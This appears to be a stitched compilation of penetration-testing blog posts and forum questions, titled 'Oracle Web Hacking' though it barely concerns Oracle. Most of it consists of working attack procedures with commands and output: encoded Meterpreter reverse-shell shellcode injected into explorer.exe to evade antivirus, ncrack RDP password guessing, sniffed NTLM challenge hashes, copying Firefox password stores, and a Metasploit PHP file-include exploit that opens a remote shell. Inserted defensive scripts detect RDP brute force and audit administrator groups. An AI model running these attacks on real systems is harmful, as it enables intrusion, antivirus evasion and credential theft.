Oracle Web Hacking Part I

Carnal0wnage, 13:22
Need to check a few specific Nessus plugins against a host?
$ sudo ./nessuscmd 192.168.1.92 -p80,443 -v -V -i 38157,10107
Starting nessuscmd 4.4.0
Scanning '192.168.1.92'...
Host 192.168.1.92 is up
Discovered open port http (80/tcp) on 192.168.1.92
[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92
[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92
+ Results found on 192.168.1.92
+ - Port http (80/tcp) is open
[i] Plugin ID 38157
Synopsis :
The remote web server contains a document sharing software
Description :
The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personel can log into this site
See also :
http://www.microsoft.com/Sharepoint/default.mspx
Solution :
Make sure the proper access controls are put in place
Risk factor : None
Plugin output :
The following instance of SharePoint was detected on the remote host :
Version : 12.0.0.6327
URL : http://192.168.1.92/
Looks like the functionality has been there for a while:
http://blog.tenablesecurity.com/2007/07/nessus-32-beta-.html

Carnal0wnage, 8:20
I've been busy... :-(
But I do have some upcoming conference speaking engagements.
So, if you are heading to BruCon, catch me and Joe McCray talk about Pentesting High Security Environments.
If you are heading to DerbyCon, catch me and Rob Fuller talk about The Dirty Little Secrets They Didn't Teach You In Pentesting Class.
Lastly, if you'll be in Switzerland for Hashdays you can catch me talk about From Low to Pwned. I'll also be giving a talk at the Management workshop on Information Operations for Management (sorry, the info isn't on the site yet but should be here https://www.hashdays.ch/management-session.html at some point).
I'm sure there will be more stuff in November/December; it's just not scheduled yet.

Carnal0wnage, 4:12
You may find yourself needing to do process injection outside of Metasploit/Meterpreter. A good example is when you have a Java Meterpreter shell, or you have access to a GUI environment (Citrix), and/or AV is going all nom nom nom on your Metasploit binary.

There are two public options I have found; shellcodeexec and syringe.
Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject that into memory (process for syringe) and get your meterpreter shell.
shellcodeexec
https://github.com/inquisb/shellcodeexec
http://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html
= Short description =
shellcodeexec is a small script to execute in memory a sequence of opcodes.
"It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode."
"Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours."
Make the payload:
$ ./msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R
| ./msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPOyIuEaN2PdNkRrP0LKCbT
LNkQBVtNkT2VHTOX7QZGVTqIoVQIPLlGLPaQlC2TlEpKqZoVmC1ZgZBXpQBPWLKCbVpLKQRElGqZpLKQPRXK5IP
T4CzGqN0RpLKPHVxNkV8EpVaXSKSGLRiLKP4LKEQZvTqIoP1O0NLIQZoVmGqXGTxM0T5ZTGsCMIhEkQmTdPuIrR
xNkQHTdGqICRFNkVlPKNkPXELVaICNkC4NkGqZpK9CtVDEtCkCkPaV9QJPQKOM0PXCoPZNkTRZKNfQMCXEcTrEP
C0CXPwRSVRQOPTPhPLCGGVC7KOZuNXZ0GqEPEPVIZdQDV0PhQ9K0PkC0KOIERpPPV0PPQPPPQPPPCXZJTOIOKPK
OKeOgQzC5E8O0I8OxC1E8TBGpR1ClOyIvPjR0QFPWPhZ9OURTE1IoZuK5IPCDTLKORnVhRUZLE8XpLuI2PVKOIE
RJC0QzC4QFV7QxVbN9ZhQOIoZuNkTvRJG0E8EPVpGpEPRvPjGpCXRxLdCcIuIoIENsPSCZGpRvCcV7CXGrIIZhQ
OKOKeEQKsVIO6NeIfT5ZLKsAA
Set up a listener to catch the shell:
$ ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
Run it on the windows side:
C:\WINDOWS\Temp>shellcodeexec.exe [msfencode's encoded payload]
**Must paste in the payload, can't be a .txt
Once you have a shell you need to migrate out of it; it will be in the shellcodeexec process, and as soon as someone ctrl-c's or kills that cmd.exe the process dies and so does your shell.
Looks like this:



Syringe
http://blog.securestate.com/post/2011/06/21/Syringe-utility-provides-ability-to-inject-shellcode-into-processes.aspx
http://www.securestate.com/Documents/syringe.c
= Short description =
"Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec). It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included)"
To compile: "C:\codelocation\cl syringe.c"
C:\Documents and Settings\User\Desktop>syringe.exe
Syringe v1.2
A General Purpose DLL & Code Injection Utility
Usage:
Inject DLL:
syringe.exe -1 [ dll ] [ pid ]
Inject Shellcode:
syringe.exe -2 [ shellcode ] [ pid ]
Execute Shellcode:
syringe.exe -3 [ shellcode ]
-3 has the same issue as shellcodeexec: close cmd.exe or ctrl-c and you lose the shell.
-2 is preferred: locate explorer.exe and inject the shellcode into that.
C:\Documents and Settings\User\Desktop>tasklist
tasklist
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        236 K
smss.exe                     540 Console                 0        424 K
csrss.exe                    604 Console                 0      3,852 K
winlogon.exe                 628 Console                 0      5,012 K
services.exe                 680 Console                 0      3,440 K
lsass.exe                    692 Console                 0      1,408 K
vmacthlp.exe                 848 Console                 0      2,756 K
svchost.exe                  864 Console                 0      4,924 K
svchost.exe                  944 Console                 0      4,308 K
MsMpEng.exe                 1040 Console                 0     53,812 K
svchost.exe                 1076 Console                 0     23,780 K
svchost.exe                 1164 Console                 0      3,616 K
svchost.exe                 1368 Console                 0      3,916 K
explorer.exe                1624 Console                 0     15,256 K
spoolsv.exe                 1656 Console                 0      6,072 K
VMwareTray.exe              1848 Console                 0      5,044 K
VMwareUser.exe              1856 Console                 0      6,328 K
msseces.exe                 1864 Console                 0     10,708 K
jusched.exe                 1920 Console                 0      4,304 K
msmsgs.exe                  1928 Console                 0      2,488 K
ctfmon.exe                  1952 Console                 0      3,248 K
svchost.exe                  740 Console                 0      3,760 K
jqs.exe                     1108 Console                 0      1,396 K
vmtoolsd.exe                1264 Console                 0      9,976 K
VMUpgradeHelper.exe         1212 Console                 0      4,176 K
TPAutoConnSvc.exe           2396 Console                 0      4,392 K
alg.exe                     2680 Console                 0      3,612 K
TPAutoConnect.exe           3060 Console                 0      4,848 K
iexplore.exe                3784 Console                 0     16,300 K
iexplore.exe                4064 Console                 0     45,392 K
wuauclt.exe                 1224 Console                 0      4,276 K
java.exe                    1112 Console                 0     27,516 K
java.exe                    2520 Console                 0     14,272 K
notepad.exe                  440 Console                 0      3,572 K
jucheck.exe                 3112 Console                 0      6,120 K
cmd.exe                     3260 Console                 0      2,700 K
tasklist.exe                3332 Console                 0      4,580 K
wmiprvse.exe                3368 Console                 0      5,824 K
C:\Documents and Settings\User\Desktop>syringe.exe -2 PYIIIIIIIIIIIIIIII7Q
ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlZHMYEPGpEPE0NiXeVQXRQ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 1624
Looks like this (you can use the same shellcode in syringe):



Carnal0wnage, 15:41
So thanks to mubix for telling me that ncrack now supports RDP. Very cool stuff.
user@ubuntu:~/pentest/ncrack$ ncrack -vv -d7 --user administrator 192.168.1.100:3389,CL=10
Fetchfile found /usr/local/share/ncrack/default.pwd
Starting Ncrack 0.3ALPHA ( http://ncrack.org ) at 2011-02-09 15:28 PST
rdp://192.168.1.100:3389 (EID 1) Login failed: 'administrator' '123456'
rdp://192.168.1.100:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.96
...
rdp://192.168.1.100:3389 (EID 1518) Login failed: 'administrator' 'pitbull'
rdp://192.168.1.100:3389 (EID 1518) Attempts: total 1519 completed 1513 supported 1 --- rate 3.10
rdp://192.168.1.100:3389 (EID 1520) Login failed: 'administrator' 'geraldine'
rdp://192.168.1.100:3389 (EID 1520) Attempts: total 1520 completed 1514 supported 1 --- rate 3.17
rdp://192.168.1.100:3389 (EID 1522) Login failed: 'administrator' 'allstar'
rdp://192.168.1.100:3389 last: 0.00 current 0.00 parallelism 10
rdp://192.168.1.100:3389 Increasing connection limit to: 10
rdp://192.168.1.100:3389 (EID 1522) Attempts: total 1521 completed 1515 supported 1 --- rate 3.00
...
Keep in mind that against XP you can only have one connection at a time, so you'll have to set your Connection Limit value to 1 (CL=1).
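A run like the one above is a few failed logons per second from a single source, and each one lands in the Windows Security log as event 4625. The rule below is an added example, not from the post or from ncrack: it counts 4625s per source address in a sliding window and reports sources that cross a threshold. SAMPLE_EVENTS is constructed (field names are my own shorthand for TimeCreated, IpAddress and LogonType from the event). Logon type 10 is RemoteInteractive, the classic RDP logon; when Network Level Authentication is on, the failed attempts are recorded as type 3 instead, so both are counted by default.

```python
"""Flag RDP password guessing from failed-logon events (added example, not
from the original post).  ncrack above drives a few attempts per second from
one source; Windows records each as Security event 4625.  The rule counts
4625s per source IP in a sliding window.  The events below are constructed;
on a real host feed it the TimeCreated / IpAddress / LogonType fields of
4625 from the Security log.  Logon type 10 is RemoteInteractive (classic
RDP); with Network Level Authentication the failures arrive as type 3, so
both are counted by default.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed: 15 failures in 15 s for 'administrator' from one host, and a
# user who mistypes twice and then logs in (4624).
SAMPLE_EVENTS = (
    [{"time": "2011-02-09 15:28:%02d" % s, "id": 4625, "user": "administrator",
      "ip": "192.168.1.50", "logon_type": 10} for s in range(1, 16)]
    + [{"time": "2011-02-09 15:30:05", "id": 4625, "user": "jsmith",
        "ip": "192.168.1.77", "logon_type": 10},
       {"time": "2011-02-09 15:30:40", "id": 4625, "user": "jsmith",
        "ip": "192.168.1.77", "logon_type": 10},
       {"time": "2011-02-09 15:31:00", "id": 4624, "user": "jsmith",
        "ip": "192.168.1.77", "logon_type": 10}]
)


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def rdp_bruteforce_sources(events, threshold=10, window_seconds=60,
                           logon_types=(10, 3)):
    """Return {source_ip: peak failures inside one window} for sources at or
    above `threshold`.  Only event 4625 with an RDP-relevant logon type counts."""
    per_ip = defaultdict(list)
    for e in events:
        if e["id"] == 4625 and e["logon_type"] in logon_types:
            per_ip[e["ip"]].append(parse_time(e["time"]))
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            # advance the window start until it fits within window_seconds
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    print(rdp_bruteforce_sources(SAMPLE_EVENTS))
```

Set the threshold below the account lockout threshold so the alert fires before the attacker starts locking out accounts, and keep the window short: the point of the rule is the rate, which is what separates a tool run from a user who forgot a password.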

Carnal0wnage, 6:02
One of my favorite talks from this year's BlackHat DC was Ryan Kazanciyan's & Sean Coyne's "The Getaway" talk on data exfiltration.
whitepaper:
https://media.blackhat.com/bh-dc-11/Coyne/BlackHat_DC_2011_Coyne_Gateway-wp.pdf
slides:
https://media.blackhat.com/bh-dc-11/Coyne/BlackHat_DC_2011_Coyne_Gateway-Slides.pdf
Everyone should check out the slides and the whitepaper, although the slides are better with the case studies and the diagrams. When you check out the slides I encourage you to think about your last pentest and:
1. Could your pentest shop emulate an attacker of the level in the case studies?
2. Did you or they try to scope the test in order to test things like this... aka do a Full Scope test?
3. If you aren't letting your pentesters go after your network like this, how do you think YOUR network will hold up against someone that knows what they are doing?
If you ARE a pentester when was the last time you got the time and scope to do something on the order of these attacks and post exploitation activities from the case studies?
We are getting great at catching our penetration testers (video) but still horrible at catching bad guys. Rather than draining your corporate bank account to have some shop come in and help you clean up your mess after you've discovered someone stealing everything you own... 1. pick a Full Scope shop that can emulate advanced attackers and not just script kiddies with a checkbook, and 2. train like you fight: open the scope for your test, give your testers time to conduct a REAL test, and let your pentesters go after it like a real bad guy would.
Instead of making your testers "test" that same 500 hosts out of 10,000 hosts with no client-sides or user interaction allowed... ask, make, force them to conduct an end-to-end test of the expensive black boxes you have sitting in the rack, your user education, your network segmentation, and your NOC/SOC's ability to test and respond to attacks. Better to find out you suck during your test instead of when someone is stealing everything that makes you money.
Train like you fight.

Carnal0wnage, 6:03
Ben Tomhave has a good post over on his blog:
http://www.secureconsulting.net/2010/10/there_is_no_win.html
Go read it. It's short... won't take long, I promise.
In part I agree; you are never going to "win" by keeping an attacker out. Like he puts in the post:
Traditionally we've held the mindset that we "win" if we stop the attackers. This mindset is sheer folly. To "win" in this scenario we need to successfully defend against 100% of attacks, whereas the attacker need only succeed once (probabilistically this works out to being far less than 100%).
Instead, we need to acknowledge the nature of our asymmetric threat and realize that there is no way to achieve "perfect" security and resist 100% of attacks. To think otherwise is willfully ignorant. Instead, we must accept a new status quo based on survivability. That is, despite successful attacks, we can consider ourselves victorious in conflict merely by surviving.
Protecting YOUR important data on the network is ultimately the goal of most network security. Keeping the attackers out is a silly goal. You are one Adobe/Flash/Java/whatever 0day away from failing to keep attackers out and thus "losing".
Surviving a network attack is not the same as surviving a mortar attack on a FOB, where if I'm still breathing and have use of my limbs at the end of it I can call that a "win". In turn, it's not a successful penetration test or attack if you merely "get in" and pop a bunch of shells (see Chris Nickerson's Top 5 Ways To Destroy A Company talk). It's a "win" when I steal what makes that company money, extract it without them knowing, then show it to them later for the "poop in the pants" moment. A report with a bunch of screenies of shells doesn't convey the same sense of "oh shit" that the first 100 entries of their key database does. In this case, while the business may have thought they "survived", they in fact "lost".
We're getting really good at teaching our clients how to catch penetration testers and their methodologies, and conditioning them that this is a "win", when in fact most times defenders fail to see and catch people with a modified methodology, non-public tools, or "non-standard" goals.

remote-exploit & backtrack, 8:51
I am busy testing a system and Nessus reports that it is possible to exploit it and from the Nessus output it seems like Nessus was successful, see below. However, I cannot find any information anywhere on how to manually produce this vulnerability. Do not confuse it with the horde of other telnet vulnerabilities out there.
I thought it would be as simple as some of the old telnet environment variable vulnerabilities, e.g. telnet -l '-fbin' systemx.com, but it does not seem to work, any ideas?
Kerberos telnet Crafted Username Remote Authentication Bypass
Synopsis:
It is possible to log into the remote system using telnet without supplying any credentials
Description:
The remote version of kerberos telnet does not sanitize the user-supplied 'USER' environement variable. By supplying a specially malformed USER environment variable, an attacker may force the remote telnet server to believe that the user has already authenticated.
Risk factor:
High
CVSS Base Score:7.6
CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C
Solution:
Apply the patch below or contact your vendor for a patch :
Plugin output:
It was possible to log in and execute "id" : ];root@systemx:~ [root@systemx ~]# uid=
Plugin ID:
24998
CVE:
CVE-2007-0956
BID:
23281
Other references:
OSVDB:34106

remote-exploit & backtrack, 5:00
I had read about the following:
1) honey-pots (low interaction and high interaction honey-pots)
2) honey-nets (network of honey-pots)
3) honey-walls!! (combination of honey-pot + firewall + router + gateway)
I had downloaded some low interaction honeypot system and used it, but I didn't know how I can set up honey-nets or honey-walls and their configuration etc.
Did you guys have any experience with honey-nets and honey-walls and high interaction honey-pots?
If yes, can anybody tell me where I can learn about them?
And also I heard it is hard for the attackers to detect a honey-wall, because it acts as a multi-purpose device, so according to me they cannot detect it easily..
I tried on Google and ended up with only theory, so I decided to ask here...
Hope I will get some ideas here...

remote-exploit & backtrack, 6:31
Hello there,
my question is quite short (hopefully the answer is longer^^).
Does anybody know an application to recover a "ssh-private-key-passphrase", to know how strong it is?
greets,

Carnal0wnage, 9:56
I covered some of the halflm challenge sniffing stuff in a previous post, but I had to revisit it the other day for work and couldn't find the actual tables and program from the post, so here are some updated links.
where to grab the tables:
http://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/
where to grab the program:
http://sourceforge.net/projects/rcracki/
Some gotchas I ran into on the last PT: for some reason I was getting odd hashes in the SMB and NTLM sniffing modules. In some cases the hashes were not the same for the same username and hostname; these were unusable. I also had some that had a bunch of zeros in them; those were also not crackable.
Windows 2000 2195:Windows 2000 5.0:1122334455667788:4c4d5353500003000000010001004600000000000000470000000000000040000000000000004000000006000600400000001000100047000000158a88e048004f0044000081196a7af2e4491c28af3025741067535700:00000000000000000000000000000000
But I did get smb_login scanned, that was fun:
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:59de5d885e583167c3a9a92ac42c0ae52f85252cc731bb25:5ada49d539bd174e7049805dc1004925e25130c33dbe892a
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:40305b22075d6000d0508d9ad1f7beb02f85252cc731bb25:337c939e66480243d1833309b8afe49a81fe4c5e646bf00a
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:daf3570c10ed2817c3d8a05d69f9ef292f85252cc731bb25:d3fb390bac5d152f7a394466fbef686e275d05b99c0a115e
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:d737aa8f95ce38359cab5d8a2519c4b92f85252cc731bb25:0624a3f7d457c54b163c641dbf4b7963548ef1c5d0397cbf
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:0e89a68d07e315c6035e82b757b955882f85252cc731bb25:58f2d720179b4a38a0523e02aef0d41dacccd6577eaa943c
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:aa9436c1d40cb53f3e7a20091c4b931c2f85252cc731bb25:8ac45acdbd60f2fad3081ecf005536efa6009c21ca5faf36
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:dce867f0cb638db2dbcc3576a52dc4612f85252cc731bb25:8990b33dac65c5ef75073829894b911a983c1e260fbd1097
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:6f9d851d74c8a095c9df672a1554bebc2f85252cc731bb25:89953de6f957b7db5fe664d23af3de41dd38f5ec0a4a6eb0
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b7582273227fd61a5952f85252cc731bb25:76d3c3deb0bb8ef1a1e41ab6a3f6c686a321ce016c624567
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b754db66776827758d30b7892eef2e3f2bc:df58ae0f786becc11be11034dc53b21bdf1d73579af868d1
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:de5d1d85daf6593d0a09ff32049013ab2f85252cc731bb25:526471d8c4a0ecc8af05851804ea8fdd26848fa3ccc63152
ADMIN Windows 2000 5.0:NULL:1122334455667788:b8489edee1058b43f3ce0f0abe5a16872f85252cc731bb25:57b9c47a75335692f60e787e41cd16a292a21bc667b3fd02
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:2b6b134af8d48f2a972bff5660420d582f85252cc731bb25:5018402148e15a8d77cb22dd46f1449a2791416b73ee9c3d
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:bb49aefd51ed0dccd5be291bd33be3052f85252cc731bb25:c9b255750bd88ac72e03adafda261e62618c943f7d59daf5

Carnal0wnage, 19:11
Got asked to help remotely locate local admins on boxes on a network.
rpcclient $> enumalsgroups
Usage: enumalsgroups builtin|domain [access mask]
rpcclient $> enumalsgroups builtin
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]
Now you would think that doing a querygroup would give you the right output, but actually you get:
rpcclient $> querygroup 0x220
result was NT_STATUS_NO_SUCH_GROUP
Honestly I have no idea why this doesn't work, it *should*. If anyone knows why it doesn't I know more than one person who would like to know.
Anyway it takes one more step but you can do it this way:
rpcclient $> queryaliasmem
Usage: queryaliasmem builtin|domain rid [access mask]
rpcclient $> queryaliasmem builtin 0x220
sid:[S-1-5-21-1214440339-1383384898-839522115-500]
sid:[S-1-5-21-1214440339-1383384898-839522115-1003]
sid:[S-1-5-21-2392188729-2485841371-4291725810-512]
Then you can look up who those SIDs belong to
rpcclient $> lookupsids
Usage: lookupsids [sid1 [sid2 [...]]]
rpcclient $> lookupsids S-1-5-21-1214440339-1383384898-839522115-500
S-1-5-21-1214440339-1383384898-839522115-500 PC\Administrator (1)
rpcclient $> lookupsids
S-1-5-21-1214440339-1383384898-839522115-1003
S-1-5-21-1214440339-1383384898-839522115-1003 PC\user (1)
rpcclient $> lookupsids
S-1-5-21-2392188729-2485841371-4291725810-512 rpc_api_pipe: Remote machine 192.168.242.128 pipe \lsarpc fnum 0x4001 returned critical error. Error was Call timed out: server did not respond after 10000 milliseconds result was NT_STATUS_IO_TIMEOUT
Not sure about the 512 (it's a MS built-in account, I think) but the 1003 was the user I added to the local admins group.
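The enumalsgroups, queryaliasmem and lookupsids chain above, turned into a small audit script. This is an added example, not code from the post: it parses the three rpcclient outputs (sample text constructed from the session above), resolves each Administrators member to a name, and falls back to well-known RIDs when lookupsids cannot resolve a SID, as happened for the 512 SID in the session.

```python
"""Turn the three rpcclient outputs from the session above into an auditable
list of Administrators members.  Added example; the sample output below is
constructed from the post, not captured live."""
import re

# Well-known relative IDs (RIDs) from the Windows security model; used as a
# fallback when lookupsids cannot resolve a SID (as happened for the 512 SID).
WELL_KNOWN_RIDS = {
    500: "Administrator (built-in account)",
    501: "Guest (built-in account)",
    512: "Domain Admins (domain group)",
    513: "Domain Users (domain group)",
}

ALIAS_RE = re.compile(r"group:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")
MEMBER_RE = re.compile(r"sid:\[(?P<sid>S-1-5-21(?:-\d+){4})\]")
LOOKUP_RE = re.compile(r"^(?P<sid>S-1-5-21(?:-\d+){4})\s+(?P<name>\S+)\s+\((?P<type>\d+)\)\s*$")

# Constructed sample: `enumalsgroups builtin`
ENUMALSGROUPS_OUTPUT = """
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Users] rid:[0x221]
"""
# Constructed sample: `queryaliasmem builtin 0x220`
QUERYALIASMEM_OUTPUT = """
sid:[S-1-5-21-1214440339-1383384898-839522115-500]
sid:[S-1-5-21-1214440339-1383384898-839522115-1003]
sid:[S-1-5-21-2392188729-2485841371-4291725810-512]
"""
# Constructed sample: `lookupsids`; the third SID timed out, so only two resolved
LOOKUPSIDS_OUTPUT = r"""
S-1-5-21-1214440339-1383384898-839522115-500 PC\Administrator (1)
S-1-5-21-1214440339-1383384898-839522115-1003 PC\user (1)
"""


def parse_aliases(text):
    """'group:[Administrators] rid:[0x220]' lines -> {'Administrators': 0x220, ...}."""
    return {m["name"]: int(m["rid"], 16) for m in ALIAS_RE.finditer(text)}


def parse_members(text):
    """'sid:[S-1-5-21-...]' lines -> list of member SIDs, in output order."""
    return [m["sid"] for m in MEMBER_RE.finditer(text)]


def parse_lookups(text):
    """'S-1-5-21-... PC\\user (1)' lines -> {sid: name}; unresolved SIDs are absent."""
    found = {}
    for line in text.splitlines():
        m = LOOKUP_RE.match(line.strip())
        if m:
            found[m["sid"]] = m["name"]
    return found


def split_sid(sid):
    """Split 'S-1-5-21-A-B-C-RID' into its issuing authority and integer RID."""
    authority, _, rid = sid.rpartition("-")
    return authority, int(rid)


def resolve_members(member_sids, lookups):
    """Name each member, noting where the name came from and whether the SID
    was issued by this machine or by a domain (a foreign authority)."""
    # On a workstation or member server the RID-500 Administrator account is
    # issued by the machine's own SID authority; use it as the local reference.
    machine_auth = next(
        (split_sid(s)[0] for s in member_sids if split_sid(s)[1] == 500), None)
    rows = []
    for sid in member_sids:
        authority, rid = split_sid(sid)
        if sid in lookups:
            name, source = lookups[sid], "lookupsids"
        elif rid in WELL_KNOWN_RIDS:
            name, source = WELL_KNOWN_RIDS[rid], "well-known RID"
        else:
            name, source = "<unresolved>", "none"
        scope = "local" if authority == machine_auth else "domain"
        rows.append({"sid": sid, "rid": rid, "name": name,
                     "source": source, "scope": scope})
    return rows


def audit_administrators(enum_txt, members_txt, lookups_txt):
    """Full chain: confirm the alias RID, then resolve every member."""
    aliases = parse_aliases(enum_txt)
    if aliases.get("Administrators") != 0x220:
        raise ValueError("Administrators alias not found at the expected RID 0x220")
    return resolve_members(parse_members(members_txt), parse_lookups(lookups_txt))


if __name__ == "__main__":
    for row in audit_administrators(ENUMALSGROUPS_OUTPUT, QUERYALIASMEM_OUTPUT,
                                    LOOKUPSIDS_OUTPUT):
        print(f"{row['scope']:6} {row['sid']:<50} {row['name']} [{row['source']}]")
```

A member whose SID authority differs from the machine's own is a domain principal nested into the local group, which is exactly the case worth flagging in an audit of who holds local admin.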
11:58
Carnal0wnage
Nothing earth shattering, but since this is a place for my notes...
Sometimes while you are on a box and pilfering through all the documents doesn't yield anything useful for you to move laterally, you can sometimes grab the Firefox saved passwords. Lots of times someone will save their password to the corporate OWA, wiki, helpdesk page, or whatever. Even if it doesn't give you a *great* lead you'll at least get an idea if they are a password re-user or not.
So how to do it?
Actually it's simple. Inside of the mozilla\firefox directory will be somethingrandom.default. Inside that folder you'll find:
key3.db
signons.sqlite
If there is no master password set, all you have to do is replace the files on your test VM with the two files you downloaded, open firefox, go to preferences, security, and do a view saved passwords.
I think there are some fancy Firefox plug-ins that can pull this info out and I'm sure there are some binaries you can push up that will dump this for you as well. But this is quick and easy and you're probably already downloading files (at least you probably *should* be) anyway...
Thanks to Mubix for telling me about this.
10:01
remote-exploit & backtrack
In the Millennium series by Stieg Larsson, a talented PC user named WASP designs and implements an app named Asphyxia. The interesting part is how the app is constructed on the remote machine by the concatenation of individual payloads. Is this possible in reality? All my knowledge in pentesting is rather limited to standard approaches. Installing a vulnerability is based on the delivery of an intact piece of code that can execute, or a single event.
The concept of piecemeal delivery of code that is assembled remotely on the target machine seems to be a devilishly difficult exploit to guard against. How would an antivirus or malware scanning app know about code fragments?
Getting back to the point though, does anyone have insight into this idea?
19:19
Carnal0wnage
Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from an RFI.
Not too complicated to use: set your normal RHOST/RPORT options, set the PATH, and set your PHPURI with the vuln path, putting XXpathXX where you would normally put your PHP shell. So we take something like the Simple Text-File Login Remote File Include that has a vulnerable string of:
/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
and make your PHPURI:
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
Let's see it in action.
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...
Exploits
========
Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Space: 32768
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010
dir
0.jpeg header.inc.php license.txt slog_users.txt version.txt
1.jpeg index.asp old slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php
id uid=33(www-data) gid=33(www-data) groups=33(www-data)
7:29
Carnal0wnage
Back in 09 there was a buzz about token kidnapping by Argeniss:
http://www.argeniss.com/research.html
http://www.argeniss.com/research/TokenKidnapping.pdf
subsequently patched:
http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx
